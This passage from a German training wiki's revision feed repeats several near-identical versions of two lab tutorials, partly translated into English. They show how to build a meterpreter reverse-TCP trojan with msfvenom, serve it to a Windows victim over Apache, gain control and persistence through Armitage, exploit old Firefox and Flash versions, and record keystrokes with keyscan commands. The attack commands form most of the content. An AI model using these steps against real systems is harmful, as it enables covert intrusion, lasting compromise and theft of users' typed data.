[[Datei:8 opfer.png]]&lt;br /&gt;
&lt;br /&gt;
on the target page&lt;br /&gt;
&lt;br /&gt;
[[Datei:12 schadeware.png]]&lt;br /&gt;
&lt;br /&gt;
=take control=&lt;br /&gt;
&lt;br /&gt;
now we start metasploit and then armitage (left bar)&lt;br /&gt;
&lt;br /&gt;
[[Datei:mframe.png]]&lt;br /&gt;
&lt;br /&gt;
Preserve default setting Confirm further messages simply&lt;br /&gt;
&lt;br /&gt;
[[Datei:amriamstarten.png]]&lt;br /&gt;
&lt;br /&gt;
[[Datei:1armitagestarten.png]]&lt;br /&gt;
&lt;br /&gt;
When Armitage is started, we create a server to listen to&lt;br /&gt;
*payload&lt;br /&gt;
**windows&lt;br /&gt;
***metapreter&lt;br /&gt;
&lt;br /&gt;
Here we adapt the LPORT&lt;br /&gt;
&lt;br /&gt;
and wait for our target to connect&lt;br /&gt;
&lt;br /&gt;
Now the target computer appears on the top right&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
(durch links klick auswählen)&lt;br /&gt;
&lt;br /&gt;
=Permanently infect=&lt;br /&gt;
&lt;br /&gt;
Next we want to save the Trojan permanently&lt;br /&gt;
&lt;br /&gt;
we search for persist (double-click) and specify a new port&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
[[Datei:200persist.png]]&lt;br /&gt;
&lt;br /&gt;
If the computer is restarted, we only need to listen on the new port and connect again&lt;br /&gt;
&lt;br /&gt;
this can take a few minutes&lt;br /&gt;
&lt;br /&gt;
=What can you do=&lt;br /&gt;
Now there are many possibilities&lt;br /&gt;
*Right click infected pc&lt;br /&gt;
**meterpreter&lt;br /&gt;
***explore&lt;br /&gt;
Here we can view processes or files, infect other processes or install a keylogger, etc&lt;br /&gt;
&lt;br /&gt;
=short example keylogger=&lt;br /&gt;
&lt;br /&gt;
[[metasploit &amp;amp; armitage keylogger]]&lt;/div&gt;</summary>
		<author><name>Joshua.schreiner</name></author>
	</entry>
	<entry>
		<id>https://wiki.ixheim.de/index.php?title=Metasploit_%26_armitage_trojaner&amp;diff=18439</id>
		<title>Metasploit &amp; armitage trojaner</title>
		<link rel="alternate" type="text/html" href="https://wiki.ixheim.de/index.php?title=Metasploit_%26_armitage_trojaner&amp;diff=18439"/>
		<updated>2019-09-02T10:53:34Z</updated>

		<summary type="html">&lt;p&gt;Joshua.schreiner: /* Permanently infect */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;Setup Hacker &lt;br /&gt;
 Kali linux&lt;br /&gt;
 ip:  192.168.242.91&lt;br /&gt;
&lt;br /&gt;
Setup target&lt;br /&gt;
 Windows 7 Domain Rechner&lt;br /&gt;
 Benutzer: Admin&lt;br /&gt;
 ip:  192.168.242.76&lt;br /&gt;
&lt;br /&gt;
=Create trojan=&lt;br /&gt;
*LHOST=&amp;quot;10.81.1.1&amp;quot;&lt;br /&gt;
*LPORT=&amp;quot;7777&amp;quot;&lt;br /&gt;
LHOST is the computer that the client will connect later ...&lt;br /&gt;
*msfvenom -p windows/meterpreter/reverse_tcp LHOST=$LHOST LPORT=$LPORT --format=exe &amp;gt; program.exe&lt;br /&gt;
&lt;br /&gt;
[[Datei:7 trojaner.png]]&lt;br /&gt;
&lt;br /&gt;
=defer the program to the target=&lt;br /&gt;
the target must be made to run the program we offer in this example simply the file as download to&lt;br /&gt;
&lt;br /&gt;
 cp program.exe /var/www/html/&lt;br /&gt;
 rm /var/www/html/index.html&lt;br /&gt;
 ifconfig&lt;br /&gt;
 netstat -lntp&lt;br /&gt;
 service apache2 restart &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
[[Datei:8 opfer.png]]&lt;br /&gt;
&lt;br /&gt;
on the target page&lt;br /&gt;
&lt;br /&gt;
[[Datei:12 schadeware.png]]&lt;br /&gt;
&lt;br /&gt;
=take control=&lt;br /&gt;
&lt;br /&gt;
now we start metasploit and then armitage (left bar)&lt;br /&gt;
&lt;br /&gt;
[[Datei:mframe.png]]&lt;br /&gt;
&lt;br /&gt;
Preserve default setting Confirm further messages simply&lt;br /&gt;
&lt;br /&gt;
[[Datei:amriamstarten.png]]&lt;br /&gt;
&lt;br /&gt;
[[Datei:1armitagestarten.png]]&lt;br /&gt;
&lt;br /&gt;
When Armitage is started, we create a server to listen to&lt;br /&gt;
*payload&lt;br /&gt;
**windows&lt;br /&gt;
***metapreter&lt;br /&gt;
&lt;br /&gt;
Here we adapt the LPORT&lt;br /&gt;
&lt;br /&gt;
and wait for our target to connect&lt;br /&gt;
&lt;br /&gt;
Now the target computer appears on the top right&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
(durch links klick auswählen)&lt;br /&gt;
&lt;br /&gt;
=Permanently infect=&lt;br /&gt;
&lt;br /&gt;
Next we want to save the Trojan permanently&lt;br /&gt;
&lt;br /&gt;
we search for persist (double-click) and specify a new port&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
[[Datei:200persist.png]]&lt;br /&gt;
&lt;br /&gt;
If the computer is restarted, we only need to listen on the new port and connect again&lt;br /&gt;
&lt;br /&gt;
this can take a few minutes&lt;br /&gt;
&lt;br /&gt;
=What can you do=&lt;br /&gt;
jetzt gibt es viele Möglichkeiten&lt;br /&gt;
*Rechtsklick infizierter pc&lt;br /&gt;
**meterpreter&lt;br /&gt;
***explore&lt;br /&gt;
hier können wir uns Prozesse oder Dateien anzeigen lassen andere Prozesse infizieren oder einen keylogger installieren usw&lt;br /&gt;
&lt;br /&gt;
=short example keylogger=&lt;br /&gt;
&lt;br /&gt;
[[metasploit &amp;amp; armitage keylogger]]&lt;/div&gt;</summary>
		<author><name>Joshua.schreiner</name></author>
	</entry>
	<entry>
		<id>https://wiki.ixheim.de/index.php?title=Metasploit_%26_armitage_trojaner&amp;diff=18438</id>
		<title>Metasploit &amp; armitage trojaner</title>
		<link rel="alternate" type="text/html" href="https://wiki.ixheim.de/index.php?title=Metasploit_%26_armitage_trojaner&amp;diff=18438"/>
		<updated>2019-09-02T10:35:29Z</updated>

		<summary type="html">&lt;p&gt;Joshua.schreiner: /* take control */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;Setup Hacker &lt;br /&gt;
 Kali linux&lt;br /&gt;
 ip:  192.168.242.91&lt;br /&gt;
&lt;br /&gt;
Setup target&lt;br /&gt;
 Windows 7 Domain Rechner&lt;br /&gt;
 Benutzer: Admin&lt;br /&gt;
 ip:  192.168.242.76&lt;br /&gt;
&lt;br /&gt;
=Create trojan=&lt;br /&gt;
*LHOST=&amp;quot;10.81.1.1&amp;quot;&lt;br /&gt;
*LPORT=&amp;quot;7777&amp;quot;&lt;br /&gt;
LHOST is the computer that the client will connect later ...&lt;br /&gt;
*msfvenom -p windows/meterpreter/reverse_tcp LHOST=$LHOST LPORT=$LPORT --format=exe &amp;gt; program.exe&lt;br /&gt;
&lt;br /&gt;
[[Datei:7 trojaner.png]]&lt;br /&gt;
&lt;br /&gt;
=defer the program to the target=&lt;br /&gt;
the target must be made to run the program we offer in this example simply the file as download to&lt;br /&gt;
&lt;br /&gt;
 cp program.exe /var/www/html/&lt;br /&gt;
 rm /var/www/html/index.html&lt;br /&gt;
 ifconfig&lt;br /&gt;
 netstat -lntp&lt;br /&gt;
 service apache2 restart &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
[[Datei:8 opfer.png]]&lt;br /&gt;
&lt;br /&gt;
on the target page&lt;br /&gt;
&lt;br /&gt;
[[Datei:12 schadeware.png]]&lt;br /&gt;
&lt;br /&gt;
=take control=&lt;br /&gt;
&lt;br /&gt;
now we start metasploit and then armitage (left bar)&lt;br /&gt;
&lt;br /&gt;
[[Datei:mframe.png]]&lt;br /&gt;
&lt;br /&gt;
Preserve default setting Confirm further messages simply&lt;br /&gt;
&lt;br /&gt;
[[Datei:amriamstarten.png]]&lt;br /&gt;
&lt;br /&gt;
[[Datei:1armitagestarten.png]]&lt;br /&gt;
&lt;br /&gt;
When Armitage is started, we create a server to listen to&lt;br /&gt;
*payload&lt;br /&gt;
**windows&lt;br /&gt;
***metapreter&lt;br /&gt;
&lt;br /&gt;
Here we adapt the LPORT&lt;br /&gt;
&lt;br /&gt;
and wait for our target to connect&lt;br /&gt;
&lt;br /&gt;
Now the target computer appears on the top right&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
(durch links klick auswählen)&lt;br /&gt;
&lt;br /&gt;
=Permanently infect=&lt;br /&gt;
&lt;br /&gt;
als nächstes wollen wir den Trojaner dauerhaft speichern &lt;br /&gt;
&lt;br /&gt;
wir suchen nach persist (mit Doppelklick auswählen) und geben einen neuen Port an&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
[[Datei:200persist.png]]&lt;br /&gt;
&lt;br /&gt;
wen der Computer nun neugestartet wird müssen wir nur auf dem neuen Port lauschen und werden wieder verbunden&lt;br /&gt;
&lt;br /&gt;
diese kann ein par Minuten dauern&lt;br /&gt;
&lt;br /&gt;
=What can you do=&lt;br /&gt;
jetzt gibt es viele Möglichkeiten&lt;br /&gt;
*Rechtsklick infizierter pc&lt;br /&gt;
**meterpreter&lt;br /&gt;
***explore&lt;br /&gt;
hier können wir uns Prozesse oder Dateien anzeigen lassen andere Prozesse infizieren oder einen keylogger installieren usw&lt;br /&gt;
&lt;br /&gt;
=short example keylogger=&lt;br /&gt;
&lt;br /&gt;
[[metasploit &amp;amp; armitage keylogger]]&lt;/div&gt;</summary>
		<author><name>Joshua.schreiner</name></author>
	</entry>
	<entry>
		<id>https://wiki.ixheim.de/index.php?title=Metasploit_%26_armitage_trojaner&amp;diff=18437</id>
		<title>Metasploit &amp; armitage trojaner</title>
		<link rel="alternate" type="text/html" href="https://wiki.ixheim.de/index.php?title=Metasploit_%26_armitage_trojaner&amp;diff=18437"/>
		<updated>2019-09-02T10:30:58Z</updated>

		<summary type="html">&lt;p&gt;Joshua.schreiner: /* defer the program to the target */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;Setup Hacker &lt;br /&gt;
 Kali linux&lt;br /&gt;
 ip:  192.168.242.91&lt;br /&gt;
&lt;br /&gt;
Setup target&lt;br /&gt;
 Windows 7 Domain Rechner&lt;br /&gt;
 Benutzer: Admin&lt;br /&gt;
 ip:  192.168.242.76&lt;br /&gt;
&lt;br /&gt;
=Create trojan=&lt;br /&gt;
*LHOST=&amp;quot;10.81.1.1&amp;quot;&lt;br /&gt;
*LPORT=&amp;quot;7777&amp;quot;&lt;br /&gt;
LHOST is the computer that the client will connect later ...&lt;br /&gt;
*msfvenom -p windows/meterpreter/reverse_tcp LHOST=$LHOST LPORT=$LPORT --format=exe &amp;gt; program.exe&lt;br /&gt;
&lt;br /&gt;
[[Datei:7 trojaner.png]]&lt;br /&gt;
&lt;br /&gt;
=defer the program to the target=&lt;br /&gt;
the target must be made to run the program we offer in this example simply the file as download to&lt;br /&gt;
&lt;br /&gt;
 cp program.exe /var/www/html/&lt;br /&gt;
 rm /var/www/html/index.html&lt;br /&gt;
 ifconfig&lt;br /&gt;
 netstat -lntp&lt;br /&gt;
 service apache2 restart &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
[[Datei:8 opfer.png]]&lt;br /&gt;
&lt;br /&gt;
on the target page&lt;br /&gt;
&lt;br /&gt;
[[Datei:12 schadeware.png]]&lt;br /&gt;
&lt;br /&gt;
=take control=&lt;br /&gt;
&lt;br /&gt;
nun starten wir erst metasploit und danach armitage (linke leiste)&lt;br /&gt;
&lt;br /&gt;
[[Datei:mframe.png]]&lt;br /&gt;
&lt;br /&gt;
Standard Einstellung beibehalten weitere Meldungen einfach bestätigen&lt;br /&gt;
&lt;br /&gt;
[[Datei:amriamstarten.png]]&lt;br /&gt;
&lt;br /&gt;
[[Datei:1armitagestarten.png]]&lt;br /&gt;
&lt;br /&gt;
wenn armitage gestartet ist erstellen wir einen Server zum lauschen&lt;br /&gt;
*payload&lt;br /&gt;
**windows&lt;br /&gt;
***metapreter&lt;br /&gt;
&lt;br /&gt;
hier passen wir den LPORT an&lt;br /&gt;
&lt;br /&gt;
und warten darauf das sich unser opfer verbindet&lt;br /&gt;
&lt;br /&gt;
nun erscheint oben rechts der opfer Computer&lt;br /&gt;
&lt;br /&gt;
(durch links klick auswählen)&lt;br /&gt;
&lt;br /&gt;
=Permanently infect=&lt;br /&gt;
&lt;br /&gt;
als nächstes wollen wir den Trojaner dauerhaft speichern &lt;br /&gt;
&lt;br /&gt;
wir suchen nach persist (mit Doppelklick auswählen) und geben einen neuen Port an&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
[[Datei:200persist.png]]&lt;br /&gt;
&lt;br /&gt;
wen der Computer nun neugestartet wird müssen wir nur auf dem neuen Port lauschen und werden wieder verbunden&lt;br /&gt;
&lt;br /&gt;
diese kann ein par Minuten dauern&lt;br /&gt;
&lt;br /&gt;
=What can you do=&lt;br /&gt;
jetzt gibt es viele Möglichkeiten&lt;br /&gt;
*Rechtsklick infizierter pc&lt;br /&gt;
**meterpreter&lt;br /&gt;
***explore&lt;br /&gt;
hier können wir uns Prozesse oder Dateien anzeigen lassen andere Prozesse infizieren oder einen keylogger installieren usw&lt;br /&gt;
&lt;br /&gt;
=short example keylogger=&lt;br /&gt;
&lt;br /&gt;
[[metasploit &amp;amp; armitage keylogger]]&lt;/div&gt;</summary>
		<author><name>Joshua.schreiner</name></author>
	</entry>
	<entry>
		<id>https://wiki.ixheim.de/index.php?title=Metasploit_%26_armitage_trojaner&amp;diff=18436</id>
		<title>Metasploit &amp; armitage trojaner</title>
		<link rel="alternate" type="text/html" href="https://wiki.ixheim.de/index.php?title=Metasploit_%26_armitage_trojaner&amp;diff=18436"/>
		<updated>2019-09-02T10:28:40Z</updated>

		<summary type="html">&lt;p&gt;Joshua.schreiner: /* defer the program to the target */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;Setup Hacker &lt;br /&gt;
 Kali linux&lt;br /&gt;
 ip:  192.168.242.91&lt;br /&gt;
&lt;br /&gt;
Setup target&lt;br /&gt;
 Windows 7 Domain Rechner&lt;br /&gt;
 Benutzer: Admin&lt;br /&gt;
 ip:  192.168.242.76&lt;br /&gt;
&lt;br /&gt;
=Create trojan=&lt;br /&gt;
*LHOST=&amp;quot;10.81.1.1&amp;quot;&lt;br /&gt;
*LPORT=&amp;quot;7777&amp;quot;&lt;br /&gt;
LHOST is the computer that the client will connect later ...&lt;br /&gt;
*msfvenom -p windows/meterpreter/reverse_tcp LHOST=$LHOST LPORT=$LPORT --format=exe &amp;gt; program.exe&lt;br /&gt;
&lt;br /&gt;
[[Datei:7 trojaner.png]]&lt;br /&gt;
&lt;br /&gt;
=defer the program to the target=&lt;br /&gt;
the target must be made to run the program we offer in this example simply the file as download to&lt;br /&gt;
&lt;br /&gt;
 cp program.exe /var/www/html/&lt;br /&gt;
 rm /var/www/html/index.html&lt;br /&gt;
 ifconfig&lt;br /&gt;
 netstat -lntp&lt;br /&gt;
 service apache2 restart &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
[[Datei:8 opfer.png]]&lt;br /&gt;
&lt;br /&gt;
auf der opfer Seite&lt;br /&gt;
&lt;br /&gt;
[[Datei:12 schadeware.png]]&lt;br /&gt;
&lt;br /&gt;
=take control=&lt;br /&gt;
&lt;br /&gt;
nun starten wir erst metasploit und danach armitage (linke leiste)&lt;br /&gt;
&lt;br /&gt;
[[Datei:mframe.png]]&lt;br /&gt;
&lt;br /&gt;
Standard Einstellung beibehalten weitere Meldungen einfach bestätigen&lt;br /&gt;
&lt;br /&gt;
[[Datei:amriamstarten.png]]&lt;br /&gt;
&lt;br /&gt;
[[Datei:1armitagestarten.png]]&lt;br /&gt;
&lt;br /&gt;
wenn armitage gestartet ist erstellen wir einen Server zum lauschen&lt;br /&gt;
*payload&lt;br /&gt;
**windows&lt;br /&gt;
***metapreter&lt;br /&gt;
&lt;br /&gt;
hier passen wir den LPORT an&lt;br /&gt;
&lt;br /&gt;
und warten darauf das sich unser opfer verbindet&lt;br /&gt;
&lt;br /&gt;
nun erscheint oben rechts der opfer Computer&lt;br /&gt;
&lt;br /&gt;
(durch links klick auswählen)&lt;br /&gt;
&lt;br /&gt;
=Permanently infect=&lt;br /&gt;
&lt;br /&gt;
als nächstes wollen wir den Trojaner dauerhaft speichern &lt;br /&gt;
&lt;br /&gt;
wir suchen nach persist (mit Doppelklick auswählen) und geben einen neuen Port an&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
[[Datei:200persist.png]]&lt;br /&gt;
&lt;br /&gt;
wen der Computer nun neugestartet wird müssen wir nur auf dem neuen Port lauschen und werden wieder verbunden&lt;br /&gt;
&lt;br /&gt;
diese kann ein par Minuten dauern&lt;br /&gt;
&lt;br /&gt;
=What can you do=&lt;br /&gt;
jetzt gibt es viele Möglichkeiten&lt;br /&gt;
*Rechtsklick infizierter pc&lt;br /&gt;
**meterpreter&lt;br /&gt;
***explore&lt;br /&gt;
hier können wir uns Prozesse oder Dateien anzeigen lassen andere Prozesse infizieren oder einen keylogger installieren usw&lt;br /&gt;
&lt;br /&gt;
=short example keylogger=&lt;br /&gt;
&lt;br /&gt;
[[metasploit &amp;amp; armitage keylogger]]&lt;/div&gt;</summary>
		<author><name>Joshua.schreiner</name></author>
	</entry>
	<entry>
		<id>https://wiki.ixheim.de/index.php?title=Metasploit_%26_armitage_trojaner&amp;diff=18435</id>
		<title>Metasploit &amp; armitage trojaner</title>
		<link rel="alternate" type="text/html" href="https://wiki.ixheim.de/index.php?title=Metasploit_%26_armitage_trojaner&amp;diff=18435"/>
		<updated>2019-09-02T10:26:22Z</updated>

		<summary type="html">&lt;p&gt;Joshua.schreiner: /* Create trojan */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;Setup Hacker &lt;br /&gt;
 Kali linux&lt;br /&gt;
 ip:  192.168.242.91&lt;br /&gt;
&lt;br /&gt;
Setup target&lt;br /&gt;
 Windows 7 Domain Rechner&lt;br /&gt;
 Benutzer: Admin&lt;br /&gt;
 ip:  192.168.242.76&lt;br /&gt;
&lt;br /&gt;
=Create trojan=&lt;br /&gt;
*LHOST=&amp;quot;10.81.1.1&amp;quot;&lt;br /&gt;
*LPORT=&amp;quot;7777&amp;quot;&lt;br /&gt;
LHOST is the computer that the client will connect later ...&lt;br /&gt;
*msfvenom -p windows/meterpreter/reverse_tcp LHOST=$LHOST LPORT=$LPORT --format=exe &amp;gt; program.exe&lt;br /&gt;
&lt;br /&gt;
[[Datei:7 trojaner.png]]&lt;br /&gt;
&lt;br /&gt;
=defer the program to the target=&lt;br /&gt;
das opfer muss dazu gebracht werden das Programm auszuführen wir bieten in diesem beispiel einfach die Datei als download an&lt;br /&gt;
&lt;br /&gt;
 cp program.exe /var/www/html/&lt;br /&gt;
 rm /var/www/html/index.html&lt;br /&gt;
 ifconfig&lt;br /&gt;
 netstat -lntp&lt;br /&gt;
 service apache2 restart &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
[[Datei:8 opfer.png]]&lt;br /&gt;
&lt;br /&gt;
auf der opfer Seite&lt;br /&gt;
&lt;br /&gt;
[[Datei:12 schadeware.png]]&lt;br /&gt;
&lt;br /&gt;
=take control=&lt;br /&gt;
&lt;br /&gt;
nun starten wir erst metasploit und danach armitage (linke leiste)&lt;br /&gt;
&lt;br /&gt;
[[Datei:mframe.png]]&lt;br /&gt;
&lt;br /&gt;
Standard Einstellung beibehalten weitere Meldungen einfach bestätigen&lt;br /&gt;
&lt;br /&gt;
[[Datei:amriamstarten.png]]&lt;br /&gt;
&lt;br /&gt;
[[Datei:1armitagestarten.png]]&lt;br /&gt;
&lt;br /&gt;
wenn armitage gestartet ist erstellen wir einen Server zum lauschen&lt;br /&gt;
*payload&lt;br /&gt;
**windows&lt;br /&gt;
***metapreter&lt;br /&gt;
&lt;br /&gt;
hier passen wir den LPORT an&lt;br /&gt;
&lt;br /&gt;
und warten darauf das sich unser opfer verbindet&lt;br /&gt;
&lt;br /&gt;
nun erscheint oben rechts der opfer Computer&lt;br /&gt;
&lt;br /&gt;
(durch links klick auswählen)&lt;br /&gt;
&lt;br /&gt;
=Permanently infect=&lt;br /&gt;
&lt;br /&gt;
als nächstes wollen wir den Trojaner dauerhaft speichern &lt;br /&gt;
&lt;br /&gt;
wir suchen nach persist (mit Doppelklick auswählen) und geben einen neuen Port an&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
[[Datei:200persist.png]]&lt;br /&gt;
&lt;br /&gt;
wen der Computer nun neugestartet wird müssen wir nur auf dem neuen Port lauschen und werden wieder verbunden&lt;br /&gt;
&lt;br /&gt;
diese kann ein par Minuten dauern&lt;br /&gt;
&lt;br /&gt;
=What can you do=&lt;br /&gt;
jetzt gibt es viele Möglichkeiten&lt;br /&gt;
*Rechtsklick infizierter pc&lt;br /&gt;
**meterpreter&lt;br /&gt;
***explore&lt;br /&gt;
hier können wir uns Prozesse oder Dateien anzeigen lassen andere Prozesse infizieren oder einen keylogger installieren usw&lt;br /&gt;
&lt;br /&gt;
=short example keylogger=&lt;br /&gt;
&lt;br /&gt;
[[metasploit &amp;amp; armitage keylogger]]&lt;/div&gt;</summary>
		<author><name>Joshua.schreiner</name></author>
	</entry>
	<entry>
		<id>https://wiki.ixheim.de/index.php?title=Metasploit_%26_armitage_trojaner&amp;diff=18434</id>
		<title>Metasploit &amp; armitage trojaner</title>
		<link rel="alternate" type="text/html" href="https://wiki.ixheim.de/index.php?title=Metasploit_%26_armitage_trojaner&amp;diff=18434"/>
		<updated>2019-09-02T10:25:12Z</updated>

		<summary type="html">&lt;p&gt;Joshua.schreiner: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;Setup Hacker &lt;br /&gt;
 Kali linux&lt;br /&gt;
 ip:  192.168.242.91&lt;br /&gt;
&lt;br /&gt;
Setup target&lt;br /&gt;
 Windows 7 Domain Rechner&lt;br /&gt;
 Benutzer: Admin&lt;br /&gt;
 ip:  192.168.242.76&lt;br /&gt;
&lt;br /&gt;
=Create trojan=&lt;br /&gt;
*LHOST=&amp;quot;10.81.1.1&amp;quot;&lt;br /&gt;
*LPORT=&amp;quot;7777&amp;quot;&lt;br /&gt;
LHOST ist der Rechner den der Client spaeter connecten ...&lt;br /&gt;
*msfvenom -p windows/meterpreter/reverse_tcp LHOST=$LHOST LPORT=$LPORT --format=exe &amp;gt; program.exe&lt;br /&gt;
&lt;br /&gt;
[[Datei:7 trojaner.png]]&lt;br /&gt;
&lt;br /&gt;
=defer the program to the target=&lt;br /&gt;
das opfer muss dazu gebracht werden das Programm auszuführen wir bieten in diesem beispiel einfach die Datei als download an&lt;br /&gt;
&lt;br /&gt;
 cp program.exe /var/www/html/&lt;br /&gt;
 rm /var/www/html/index.html&lt;br /&gt;
 ifconfig&lt;br /&gt;
 netstat -lntp&lt;br /&gt;
 service apache2 restart &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
[[Datei:8 opfer.png]]&lt;br /&gt;
&lt;br /&gt;
auf der opfer Seite&lt;br /&gt;
&lt;br /&gt;
[[Datei:12 schadeware.png]]&lt;br /&gt;
&lt;br /&gt;
=take control=&lt;br /&gt;
&lt;br /&gt;
nun starten wir erst metasploit und danach armitage (linke leiste)&lt;br /&gt;
&lt;br /&gt;
[[Datei:mframe.png]]&lt;br /&gt;
&lt;br /&gt;
Standard Einstellung beibehalten weitere Meldungen einfach bestätigen&lt;br /&gt;
&lt;br /&gt;
[[Datei:amriamstarten.png]]&lt;br /&gt;
&lt;br /&gt;
[[Datei:1armitagestarten.png]]&lt;br /&gt;
&lt;br /&gt;
wenn armitage gestartet ist erstellen wir einen Server zum lauschen&lt;br /&gt;
*payload&lt;br /&gt;
**windows&lt;br /&gt;
***metapreter&lt;br /&gt;
&lt;br /&gt;
hier passen wir den LPORT an&lt;br /&gt;
&lt;br /&gt;
und warten darauf das sich unser opfer verbindet&lt;br /&gt;
&lt;br /&gt;
nun erscheint oben rechts der opfer Computer&lt;br /&gt;
&lt;br /&gt;
(durch links klick auswählen)&lt;br /&gt;
&lt;br /&gt;
=Permanently infect=&lt;br /&gt;
&lt;br /&gt;
als nächstes wollen wir den Trojaner dauerhaft speichern &lt;br /&gt;
&lt;br /&gt;
wir suchen nach persist (mit Doppelklick auswählen) und geben einen neuen Port an&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
[[Datei:200persist.png]]&lt;br /&gt;
&lt;br /&gt;
wen der Computer nun neugestartet wird müssen wir nur auf dem neuen Port lauschen und werden wieder verbunden&lt;br /&gt;
&lt;br /&gt;
diese kann ein par Minuten dauern&lt;br /&gt;
&lt;br /&gt;
=What can you do=&lt;br /&gt;
jetzt gibt es viele Möglichkeiten&lt;br /&gt;
*Rechtsklick infizierter pc&lt;br /&gt;
**meterpreter&lt;br /&gt;
***explore&lt;br /&gt;
hier können wir uns Prozesse oder Dateien anzeigen lassen andere Prozesse infizieren oder einen keylogger installieren usw&lt;br /&gt;
&lt;br /&gt;
=short example keylogger=&lt;br /&gt;
&lt;br /&gt;
[[metasploit &amp;amp; armitage keylogger]]&lt;/div&gt;</summary>
		<author><name>Joshua.schreiner</name></author>
	</entry>
	<entry>
		<id>https://wiki.ixheim.de/index.php?title=Metasploit_browser_Exlpoit&amp;diff=18433</id>
		<title>Metasploit browser Exlpoit</title>
		<link rel="alternate" type="text/html" href="https://wiki.ixheim.de/index.php?title=Metasploit_browser_Exlpoit&amp;diff=18433"/>
		<updated>2019-09-02T10:23:44Z</updated>

		<summary type="html">&lt;p&gt;Joshua.schreiner: /* method */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;=Setup target=&lt;br /&gt;
Winxp Service pack 3&lt;br /&gt;
Firefox 3.5&lt;br /&gt;
&lt;br /&gt;
=Setup Hacker=&lt;br /&gt;
Kali Linux&lt;br /&gt;
ip: 192.168.242.53&lt;br /&gt;
&lt;br /&gt;
=Action=&lt;br /&gt;
start metasploit&lt;br /&gt;
 msfconsole&lt;br /&gt;
&lt;br /&gt;
 use exploit/multi/browser/firefox_escape_retval&lt;br /&gt;
 set payload windows/meterpreter/reverse_tcp&lt;br /&gt;
 set lhost 192.168.242.53 (lokaler Host)&lt;br /&gt;
 set svrhost 192.168.242.53 (HTTP-Server IP)&lt;br /&gt;
 set svrport 8888 (HTTP-Server Port)&lt;br /&gt;
 set lport 4444 (lokaler Port)&lt;br /&gt;
 set uripath /hack (optional)&lt;br /&gt;
 exploit&lt;br /&gt;
&lt;br /&gt;
 jetzt muss das opfer mit dem fierfox diese url aufrufen http://192.168.242.53:8888/hack&lt;br /&gt;
 wenn wir meterpreter &amp;gt; sehen hat der exploit funktioniert &lt;br /&gt;
&lt;br /&gt;
 session - i 1 (in die session gehen)&lt;br /&gt;
 sessions -h (zeigt optionen)&lt;br /&gt;
 ps (zeigt prozesse)&lt;br /&gt;
 migrate PSID (verschiebt in den prozess Z.b explorer.exe)&lt;br /&gt;
 getpid (zeigt momentanen prozess)&lt;br /&gt;
 keyscan_start (startet den keyloger)&lt;br /&gt;
 keyscan_dump (zeigt aufzeichnungen)&lt;br /&gt;
 keyscan_stop (stopt keyloger)&lt;br /&gt;
&lt;br /&gt;
=Win7 32bit Exploit=&lt;br /&gt;
http://high54security.blogspot.de/2015/05/exploiting-flash-1700134-using.html&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
* Setup target&lt;br /&gt;
&lt;br /&gt;
win732 bit&lt;br /&gt;
&lt;br /&gt;
adobeflash 17.0.0.134&lt;br /&gt;
&lt;br /&gt;
firefox&lt;br /&gt;
&lt;br /&gt;
TeamViewer ID 597 708 786&lt;br /&gt;
&lt;br /&gt;
==Hackersystem==&lt;br /&gt;
kali linux&lt;br /&gt;
&lt;br /&gt;
ip 192.168.244.50&lt;br /&gt;
&lt;br /&gt;
===on the console===&lt;br /&gt;
start metasploit console&lt;br /&gt;
*msfconsole&lt;br /&gt;
Selection of the exploits&lt;br /&gt;
*use exploit/windows/browser/adobe_flash_domain_memory_uaf&lt;br /&gt;
selection of malicious software&lt;br /&gt;
*set payload windows/meterpreter/reverse_tcp&lt;br /&gt;
put the localhost&lt;br /&gt;
*set lhost 192.168.244.50&lt;br /&gt;
putting the web server&lt;br /&gt;
*set srvhost 192.168.244.50&lt;br /&gt;
path to the hack&lt;br /&gt;
*set uripath /hack&lt;br /&gt;
execute the exploits&lt;br /&gt;
*exploit&lt;br /&gt;
&lt;br /&gt;
=on the target=&lt;br /&gt;
*go up with win7 to http://192.168.244.150:8080/hack&lt;br /&gt;
&lt;br /&gt;
=on the hackersystem=&lt;br /&gt;
==commandos==&lt;br /&gt;
 sessions -l (listet die sessions)&lt;br /&gt;
 sessions -i 1 (in die session gehen)&lt;br /&gt;
 sessions -h (zeigt optionen)&lt;br /&gt;
 ps (zeigt prozesse)&lt;br /&gt;
 migrate PSID (verschiebt in den prozess Z.b explorer.exe)&lt;br /&gt;
 getpid (zeigt momentanen prozess)&lt;br /&gt;
 keyscan_start (startet den keyloger)&lt;br /&gt;
 keyscan_dump (zeigt aufzeichnungen)&lt;br /&gt;
 keyscan_stop (stopt keyloger)&lt;br /&gt;
&lt;br /&gt;
==method==&lt;br /&gt;
enter session&lt;br /&gt;
*msf exploit(adobe_flash_domain_memory_uaf) &amp;gt; sessions -i 1&lt;br /&gt;
ps listing&lt;br /&gt;
*meterpreter &amp;gt; ps&lt;/div&gt;</summary>
		<author><name>Joshua.schreiner</name></author>
	</entry>
	<entry>
		<id>https://wiki.ixheim.de/index.php?title=Metasploit_browser_Exlpoit&amp;diff=18432</id>
